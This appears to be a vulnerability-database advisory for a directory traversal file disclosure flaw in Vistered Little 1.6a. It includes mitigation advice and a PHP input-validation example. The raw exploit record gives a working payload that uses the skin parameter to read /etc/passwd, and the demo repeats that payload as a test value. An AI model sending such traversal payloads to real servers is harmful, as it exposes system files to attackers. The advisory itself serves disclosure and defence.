Vendor: Vistered Little
By: Mahmood_ali
CVSS: 5.5 (MEDIUM)
Remote File Disclosure
CWE: 22
Product Name: Vistered Little
Affected Version From: 1.6a
Affected Version To: 1.6a
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Vistered Little 1.6a Remote File Disclosure Vulnerability

The exploit allows an attacker to disclose sensitive files on the server by manipulating the skin parameter in the common.css.php script. By using directory traversal techniques, the attacker can access files outside the web root directory, such as the /etc/passwd file.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input for the skin parameter in the common.css.php script. Limit the access rights of the web server user to prevent accessing sensitive files outside the web root directory.
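One way to apply the input validation described above, as an added example that is not code from Vistered Little or from the advisory: an allow-list check on the skin name followed by a canonical-path containment check. The function name `resolve_skin_dir`, the one-directory-per-skin layout and the temporary demo directory are assumptions, since the page does not show the source of common.css.php.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: map a user-supplied skin name to a directory under
// $skinsRoot, or return null. Assumes one sub-directory per skin.
function resolve_skin_dir(string $skin, string $skinsRoot): ?string
{
    // 1. Allow-list: a bare name only. This rejects "/", "\", "..", "%"
    //    and the NUL byte that "%00" decodes to.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $skin) !== 1) {
        return null;
    }
    // 2. Canonicalise both paths and confirm containment, so a symlinked
    //    skin directory cannot point outside the skins root either.
    $root = realpath($skinsRoot);
    $candidate = realpath($skinsRoot . DIRECTORY_SEPARATOR . $skin);
    if ($root === false || $candidate === false || !is_dir($candidate)) {
        return null;
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// Constructed demo: a throwaway skins root with a single "default" skin.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'skins_demo_' . getmypid();
@mkdir($root . DIRECTORY_SEPARATOR . 'default', 0700, true);

// Constructed sample inputs for the skin parameter.
$samples = [
    'default',                          // legitimate skin name
    "../../../../../../etc/passwd\0",   // decoded form of the value listed on this page
    '..',                               // parent directory
    'default/../..',                    // traversal behind a valid prefix
    'missing',                          // well-formed name, but no such skin
];
foreach ($samples as $s) {
    $dir = resolve_skin_dir($s, $root);
    printf("%-42s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
        $dir === null ? 'rejected' : 'accepted');
}

rmdir($root . DIRECTORY_SEPARATOR . 'default');
rmdir($root);
```

Only `default` is accepted; a caller would fall back to a fixed default skin whenever the function returns null rather than passing the raw parameter to any file function.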
Source

Exploit-DB raw data:

# Vistered Little 1.6a Remote File Disclosure Vulnerability
# Page Script : http://windyroad.org/vistered-little-1.6a.zip
# Exploit : [path]/skins/common.css.php?skin=../../../../../../etc/passwd%00
# Discovered by: Mahmood_ali

# milw0rm.com [2007-05-28]